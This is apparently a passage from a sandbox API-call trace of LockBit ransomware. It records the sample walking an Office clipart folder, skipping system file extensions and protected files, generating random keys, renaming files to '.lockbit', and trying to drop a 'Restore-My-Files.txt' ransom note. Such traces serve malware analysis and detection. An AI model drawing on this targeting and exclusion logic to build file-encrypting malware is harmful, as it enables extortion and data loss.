lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0153.491] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239935.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239935.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0153.491] malloc (_Size=0xa6) returned 0x1fa2ed8 [0153.492] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0153.493] free (_Block=0x1fa2ed8) [0153.493] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239935.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0153.493] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0153.493] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0153.493] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x660ca390, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1418, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0239941.WMF", cAlternateFileName="")) returned 1 [0153.493] lstrcmpiW (lpString1=".", lpString2="J0239941.WMF") returned -1 [0153.493] lstrcmpiW (lpString1="..", lpString2="J0239941.WMF") returned -1 [0153.493] PathFindExtensionW (pszPath="J0239941.WMF") returned=".WMF" [0153.493] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0153.493] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0153.493] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0153.493] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0153.493] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0153.493] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0153.493] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0153.493] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0153.493] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0153.493] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0153.493] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0153.493] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0153.493] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0153.494] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0153.494] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0153.494] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0153.494] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0153.494] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0153.494] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0153.494] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0153.494] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0153.494] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0153.494] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0153.494] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0153.494] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0153.494] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0153.494] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0153.494] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0153.494] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0153.494] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0153.494] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0153.494] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0153.494] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0153.494] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0153.494] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0153.494] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0153.494] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0153.495] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0153.495] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0153.495] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0153.495] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0153.495] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0153.495] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0153.495] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0153.495] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0153.495] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0153.495] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0153.495] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0239941.WMF") returned 1 [0153.495] lstrcmpiW (lpString1="ntldr", lpString2="J0239941.WMF") returned 1 [0153.495] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0239941.WMF") returned 1 [0153.495] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0239941.WMF") returned -1 [0153.495] lstrcmpiW (lpString1="autorun.inf", lpString2="J0239941.WMF") returned -1 [0153.495] lstrcmpiW (lpString1="thumbs.db", lpString2="J0239941.WMF") returned 1 [0153.495] lstrcmpiW (lpString1="iconcache.db", lpString2="J0239941.WMF") returned -1 [0153.495] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0153.495] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239941.WMF") returned=".WMF" [0153.495] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0153.495] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0153.496] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0153.496] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0153.496] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0153.496] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0153.496] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0153.496] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0153.496] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0153.496] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0153.496] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0153.496] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0153.496] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0153.496] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0153.496] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0153.496] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0153.496] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0153.496] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0153.496] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0153.496] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0153.496] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0153.496] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0153.496] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0153.496] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0153.497] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0153.497] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0153.497] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0153.497] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0153.497] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239941.WMF.lockbit") returned 72 [0153.497] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239941.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0239941.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0153.498] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0153.498] malloc (_Size=0x40068) returned 0x3df0008 [0153.498] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=5144) returned 1 [0153.498] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.499] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.499] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0153.499] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.499] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.499] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0153.499] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0153.504] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239941.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239941.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0153.504] malloc (_Size=0xa6) returned 0x1fa2ed8 [0153.504] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0153.505] free (_Block=0x1fa2ed8) [0153.505] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239941.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0153.505] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0153.505] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0153.505] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x660ca390, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1998, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0239943.WMF", cAlternateFileName="")) returned 1 [0153.505] lstrcmpiW (lpString1=".", lpString2="J0239943.WMF") returned -1 [0153.505] lstrcmpiW (lpString1="..", lpString2="J0239943.WMF") returned -1 [0153.505] PathFindExtensionW (pszPath="J0239943.WMF") returned=".WMF" [0153.506] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0153.506] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0153.506] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0153.506] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0153.506] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0153.506] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0153.506] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0153.506] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0153.506] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0153.506] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0153.506] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0153.506] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0153.506] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0153.506] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0153.506] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0153.506] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0153.506] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0153.506] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0153.506] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0153.506] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0153.506] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0153.506] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0153.506] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0153.506] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0153.506] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0153.506] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0153.506] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0153.507] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0153.507] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0153.507] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0153.507] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0153.507] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0153.507] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0153.507] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0153.507] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0153.507] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0153.507] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0153.507] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0153.507] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0153.507] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0153.507] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0153.507] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0153.507] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0153.507] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0153.507] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0153.507] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0153.507] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0153.507] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0239943.WMF") returned 1 [0153.507] lstrcmpiW (lpString1="ntldr", lpString2="J0239943.WMF") returned 1 [0153.507] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0239943.WMF") returned 1 [0153.507] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0239943.WMF") returned -1 [0153.507] lstrcmpiW (lpString1="autorun.inf", lpString2="J0239943.WMF") returned -1 [0153.507] lstrcmpiW (lpString1="thumbs.db", lpString2="J0239943.WMF") returned 1 [0153.507] lstrcmpiW (lpString1="iconcache.db", lpString2="J0239943.WMF") returned -1 [0153.508] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0153.508] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239943.WMF") returned=".WMF" [0153.508] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0153.508] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0153.508] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0153.508] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0153.508] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0153.508] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0153.508] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0153.508] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0153.508] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0153.508] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0153.508] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0153.508] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0153.508] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0153.508] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0153.508] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0153.508] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0153.508] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0153.508] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0153.508] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0153.508] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0153.508] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0153.508] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0153.508] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0153.509] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0153.509] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0153.509] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0153.509] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0153.509] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0153.509] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239943.WMF.lockbit") returned 72 [0153.509] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239943.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0239943.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0153.510] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0153.510] malloc (_Size=0x40068) returned 0x3df0008 [0153.510] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=6552) returned 1 [0153.510] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.511] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.511] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0153.511] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.511] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.512] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0153.512] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0153.516] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239943.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239943.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0153.516] malloc (_Size=0xa6) returned 0x1fa2ed8 [0153.517] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0153.518] free (_Block=0x1fa2ed8) [0153.518] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239943.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0153.518] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0153.518] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0153.518] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5661b6b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1c40, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0239951.WMF", cAlternateFileName="")) returned 1 [0153.518] lstrcmpiW (lpString1=".", lpString2="J0239951.WMF") returned -1 [0153.518] lstrcmpiW (lpString1="..", lpString2="J0239951.WMF") returned -1 [0153.518] PathFindExtensionW (pszPath="J0239951.WMF") returned=".WMF" [0153.518] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0153.518] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0153.518] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0153.518] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0153.518] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0153.518] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0153.518] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0153.518] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0153.518] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0153.518] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0153.518] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0153.518] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0153.519] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0153.519] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0153.519] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0153.519] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0153.519] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0153.519] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0153.519] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0153.519] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0153.519] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0153.519] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0153.519] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0153.519] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0153.519] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0153.519] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0153.519] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0153.519] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0153.519] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0153.519] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0153.519] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0153.519] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0153.519] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0153.519] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0153.519] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0153.519] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0153.520] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0153.520] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0153.520] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0153.520] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0153.520] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0153.520] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0153.520] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0153.520] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0153.520] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0153.520] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0153.520] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0153.520] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0239951.WMF") returned 1 [0153.520] lstrcmpiW (lpString1="ntldr", lpString2="J0239951.WMF") returned 1 [0153.520] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0239951.WMF") returned 1 [0153.520] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0239951.WMF") returned -1 [0153.520] lstrcmpiW (lpString1="autorun.inf", lpString2="J0239951.WMF") returned -1 [0153.520] lstrcmpiW (lpString1="thumbs.db", lpString2="J0239951.WMF") returned 1 [0153.520] lstrcmpiW (lpString1="iconcache.db", lpString2="J0239951.WMF") returned -1 [0153.520] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft 